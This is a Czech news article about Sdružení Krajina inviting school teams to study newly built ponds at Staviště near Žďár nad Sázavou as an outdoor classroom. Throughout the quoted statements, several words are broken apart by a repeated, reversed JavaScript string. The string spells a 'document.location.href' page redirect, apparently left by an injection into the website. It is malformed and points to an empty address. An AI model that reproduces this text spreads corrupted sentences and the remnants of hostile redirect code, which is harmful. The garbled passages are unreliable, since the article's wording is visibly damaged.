Rainbow page separator

Sdružení Krajina hledá mladé ekology k tůním u Staviště

Pátek, 4. března 2016

Rozmnožování žab Vysočina - Sdružení krajina

Žďár nad Sázavou / Do třech tůní, které se loni ve žďárské lokalitě Staviště podařilo vybudovat Sdružení Krajina za podpory Správy Chráněné krajinné oblasti (CHKO) Žďárské vrchy, se postupně stěhují živočichové i vodní hmyz.

„Je tudíž nejvyšší čas, abychom našli tým mladých badatelů, který tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to lokalitu využije jako svoji přírodní učebnu. Podobný projekt jsme realizovali již v Novém Městě na Moravě, kde jsme společně s ekotýmem první základní školy v lokalitě Hrnečnice vybudovali celkem čtyři tůně,“ informovala Dagmar Papáčková ze Sdružení Krajina s tím, že jejich snahou je aplikovat ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to model i v jiných místech se zapojením dalších škol.

Zájemci, kteří se chtějí ve žďárské lokalitě Staviště angažovat, se mohou hlásit už nyní. „Žáky i jejich učitele rádi provedeme a ukážeme jim, co všechno se dá dělat a jak na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to. Ke studiu jim bude sloužit také me[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];todická brožura Deník badatele – Jak se žije v tůních, která je plná informací a praktických cvičení. Spolupráce je oboustranně výhodná. Žáci si praktickým způsobem ověří své znalosti a naučí se měřit s nejrůznějšími přístroji. My zase získáme přehled o kvalitě lokality, a jak se v ní daří rostlinám a živočichům,“ dodala Papáčková.